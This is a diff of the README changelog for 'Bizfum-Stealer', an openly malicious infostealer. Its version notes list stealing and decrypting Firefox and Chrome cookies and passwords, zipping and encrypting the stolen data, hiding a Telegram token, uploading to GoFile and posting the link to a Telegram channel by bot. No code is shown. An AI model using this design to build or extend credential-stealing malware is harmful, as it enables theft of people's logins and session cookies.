UnknownWebPT/Bizfum-Stealer/README.md

 V0.2 - 26th of September - Added Firefox and Chrome (cookie / password) (decryption / stealing).

-V0.3 - 3rd of October    - Added Zipping of stolen data && AES Encryption of ZIP file && RSA Encryption of AES Key && Base64 Encoding of RSA encrypted AES Key
+V0.3 - 3rd of October    - Added Zipping of stolen data && AES Encryption of ZIP file && RSA Encryption of AES Key && Base64 Encoding of RSA encrypted AES Key.

+V0.4 - 22nd of October   - Added `config.py` file to help in customizing the source code.
+Custom encoding/encryption algorithm to Telegram token.
+Uploading of data to GoFile.
+Sending of the download link to a Telegram channel, through a bot.

 ## 🐞 Known Issues
 - SQLite function calls act in a unexpected way for 64-bit os.